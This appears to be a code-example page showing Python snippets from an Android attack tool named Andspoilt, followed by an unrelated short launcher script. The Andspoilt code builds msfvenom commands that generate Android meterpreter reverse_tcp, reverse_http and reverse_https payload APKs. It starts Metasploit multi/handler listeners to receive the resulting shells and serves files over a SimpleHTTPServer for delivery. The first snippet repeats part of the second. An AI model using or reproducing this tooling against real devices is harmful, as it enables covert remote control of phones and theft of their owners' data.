コード例 #1
0
                def blue():
                    while dark == "2":
                        print('''
\033[1;35m
[***]Pwning a shell[***]
\033[1;m

1) Start Android-meterpreter-staged-reverse-tcp listener
2) Start Android-meterpreter-reverse-http listener
3) Start Android-meterpreter-reverse-https listener
4) Access Root
5) Enumerate SipDroid

Use "back" to navigate to previous commands

			 ''')
                        ignition = raw_input("\033[1;36mIgnite > \033[1;m")
                        if ignition == "back":
                            splash()
                        elif ignition == "1":
                            lhost = raw_input(
                                "\033[1;32mInput your IP address > \033[1;m")
                            lport = raw_input(
                                "\033[1;32mInput the PORT > \033[1;m")
                            os.system(
                                "msfdb start && service postgresql start")
                            os.system(
                                "msfconsole  -q -x 'use exploit/multi/handler/; set payload android/meterpreter/reverse_tcp; set LPORT "
                                + lport + "; set LHOST " + lhost + "; run -j'")

                        elif ignition == "2":
                            lhost = raw_input(
                                "\033[1;32mInput your IP address > \033[1;m")
                            lport = raw_input(
                                "\033[1;32mInput the PORT > \033[1;m")
                            os.system(
                                "msfdb start && service postgresql start")
                            os.system(
                                "msfconsole  -q -x 'use exploit/multi/handler/; set payload android/meterpreter/reverse_http; set LPORT "
                                + lport + "; set LHOST " + lhost + "; run -j'")

                        elif ignition == "3":
                            lhost = raw_input(
                                "\033[1;32mInput your IP address > \033[1;m")
                            lport = raw_input(
                                "\033[1;32mInput the PORT > \033[1;m")
                            os.system(
                                "msfdb start && service postgresql start")
                            os.system(
                                "msfconsole  -q -x 'use exploit/multi/handler/; set payload android/meterpreter/reverse_https; set LPORT "
                                + lport + "; set LHOST " + lhost + "; run -j'")

                        elif ignition == "exit":
                            sys.exit()
                        else:
                            print("\033[1;31mWrong Command choosen!\033[1;m")

                    if dark == "4":
                        banner.about()
                    if dark == "5":
                        banner.help()
                    if dark == "6" or dark == 'exit':
                        print("Exit Andspoilt")
                        sys.exit(0)
                    if dark == "show w" or dark == 'warranty':
                        banner.warranty()
                    if dark == "show c" or dark == 'copyright':
                        banner.copyright()
                    if dark == "banner" or dark == 'b':
                        os.system("clear")
                        banner.banner()
コード例 #2
0
def main():
    try:
        banner.banner()

        def splash():
            while True:
                print('''
1) Create Android apk payload
2) Pwn a shell
3) Update Andspoilt
4) Credits and About
5) Help
6) Exit Andspoilt
			''')

                dark = raw_input("\033[1;36muse > \033[1;m")

                while dark == "1":
                    print('''
1) Android-meterpreter-staged-reverse-tcp
2) Android-meterpreter-reverse-http
3) Android-meterpreter-reverse-https
4) Start SimpleHTTPServer for quick file transfer

Use "back" to navigate to previous commands
					''')

                    user_command = raw_input(
                        "\033[1;32mChoose Command > \033[1;m")
                    if user_command == "1":
                        lhost = raw_input(
                            "\033[1;32mInput your IP address > \033[1;m")
                        lport = raw_input(
                            "\033[1;32mInput the PORT > \033[1;m")
                        name = raw_input(
                            "\033[1;32mEnter the output name > \033[1;m")
                        os.system(
                            'msfvenom -p android/meterpreter/reverse_tcp LHOST="'
                            + lhost + '" LPORT="' + lport +
                            '" -o /root/Desktop/' + name)
                        listen = raw_input(
                            "\033[1;32mDo you wish to start the listener now?(y/n) > \033[1;m"
                        )
                        if listen == 'yes' or listen == 'y':
                            os.system(
                                "service postgresql start && msfdb start")
                            os.system(
                                "msfconsole  -q -x 'use exploit/multi/handler/; set payload android/meterpreter/reverse_tcp; set LPORT "
                                + lport + "; set LHOST " + lhost + "; run -j'")
                        else:
                            os.system("clear")
                            banner.banner()
                            splash()

                    elif user_command == "2":
                        lhost = raw_input(
                            "\033[1;32mInput your IP address > \033[1;m")
                        lport = raw_input(
                            "\033[1;32mInput the PORT > \033[1;m")
                        name = raw_input(
                            "\033[1;32mEnter the output name > \033[1;m")
                        os.system(
                            'msfvenom -p android/meterpreter/reverse_http LHOST="'
                            + lhost + '" LPORT="' + lport +
                            '" -o /root/Desktop/' + name)
                        listen = raw_input(
                            "\033[1;32mDo you wish to start the listener now?(y/n) > \033[1;m"
                        )
                        if listen == 'yes' or listen == 'y':
                            os.system(
                                "msfdb start && service postgresql start")
                            os.system(
                                "msfconsole  -q -x 'use exploit/multi/handler/; set payload android/meterpreter/reverse_http; set LPORT "
                                + lport + "; set LHOST " + lhost + "; run -j'")
                        else:
                            os.system("clear")
                            banner.banner()
                            splash()
                    elif user_command == "3":
                        lhost = raw_input(
                            "\033[1;32mInput your IP address > \033[1;m")
                        lport = raw_input(
                            "\033[1;32mInput the PORT > \033[1;m")
                        name = raw_input(
                            "\033[1;32mEnter the output name > \033[1;m")
                        os.system(
                            'msfvenom -p android/meterpreter/reverse_https LHOST="'
                            + lhost + '" LPORT="' + lport +
                            '" -o /root/Desktop/' + name)
                        listen = raw_input(
                            "\033[1;32mDo you wish to start the listener now?(y/n) > \033[1;m"
                        )
                        if listen == 'yes' or listen == 'y':
                            os.system(
                                "msfdb start && service postgresql start")
                            os.system(
                                "msfconsole  -q -x 'use exploit/multi/handler/; set payload android/meterpreter/reverse_https; set LPORT "
                                + lport + "; set LHOST " + lhost + "; run -j'")
                        else:
                            os.system("clear")
                            banner.banner()
                            splash()

                    elif user_command == "back":
                        splash()
                    elif user_command == "gohome":
                        splash()
                    elif user_command == "4":
                        cmd4 = os.system("python2 -m SimpleHTTPServer 8080")
                    elif user_command == "exit":
                        sys.exit("Killed the program")

                    else:
                        print("\033[1;31mWrong Command choosen!\033[1;m")

                if dark == "3":
                    cwdpath = os.getcwd()
                    subprocess.Popen("%s/src/update.sh" % cwdpath,
                                     shell=True).wait()

                def blue():
                    while dark == "2":
                        print('''
\033[1;35m
[***]Pwning a shell[***]
\033[1;m

1) Start Android-meterpreter-staged-reverse-tcp listener
2) Start Android-meterpreter-reverse-http listener
3) Start Android-meterpreter-reverse-https listener
4) Access Root
5) Enumerate SipDroid

Use "back" to navigate to previous commands

			 ''')
                        ignition = raw_input("\033[1;36mIgnite > \033[1;m")
                        if ignition == "back":
                            splash()
                        elif ignition == "1":
                            lhost = raw_input(
                                "\033[1;32mInput your IP address > \033[1;m")
                            lport = raw_input(
                                "\033[1;32mInput the PORT > \033[1;m")
                            os.system(
                                "msfdb start && service postgresql start")
                            os.system(
                                "msfconsole  -q -x 'use exploit/multi/handler/; set payload android/meterpreter/reverse_tcp; set LPORT "
                                + lport + "; set LHOST " + lhost + "; run -j'")

                        elif ignition == "2":
                            lhost = raw_input(
                                "\033[1;32mInput your IP address > \033[1;m")
                            lport = raw_input(
                                "\033[1;32mInput the PORT > \033[1;m")
                            os.system(
                                "msfdb start && service postgresql start")
                            os.system(
                                "msfconsole  -q -x 'use exploit/multi/handler/; set payload android/meterpreter/reverse_http; set LPORT "
                                + lport + "; set LHOST " + lhost + "; run -j'")

                        elif ignition == "3":
                            lhost = raw_input(
                                "\033[1;32mInput your IP address > \033[1;m")
                            lport = raw_input(
                                "\033[1;32mInput the PORT > \033[1;m")
                            os.system(
                                "msfdb start && service postgresql start")
                            os.system(
                                "msfconsole  -q -x 'use exploit/multi/handler/; set payload android/meterpreter/reverse_https; set LPORT "
                                + lport + "; set LHOST " + lhost + "; run -j'")

                        elif ignition == "exit":
                            sys.exit()
                        else:
                            print("\033[1;31mWrong Command choosen!\033[1;m")

                    if dark == "4":
                        banner.about()
                    if dark == "5":
                        banner.help()
                    if dark == "6" or dark == 'exit':
                        print("Exit Andspoilt")
                        sys.exit(0)
                    if dark == "show w" or dark == 'warranty':
                        banner.warranty()
                    if dark == "show c" or dark == 'copyright':
                        banner.copyright()
                    if dark == "banner" or dark == 'b':
                        os.system("clear")
                        banner.banner()

                blue()

        splash()
    except KeyboardInterrupt:
        print("Andspoilt shutdown unexpectedly")
    except Exception:
        traceback.print_exc(file=sys.stdout)
    sys.exit(0)
コード例 #3
0
#!/usr/bin/python3 
# Created By Ybenel
# Updated In 2020/04/14
import sys
sys.path.insert(1, 'src')
from src.Banned import banners
from src.banner import banner
from src.colors import get_colors
def main():
    try:
        banners.main()
    except KeyboardInterrupt as ky:
        print(get_colors.yellow()+get_colors.red() + "\n[!] CTRL+C Detected \n"+get_colors.cyan()+"Thanks For Usage :)")
if __name__ == "__main__":
    banner()
    main()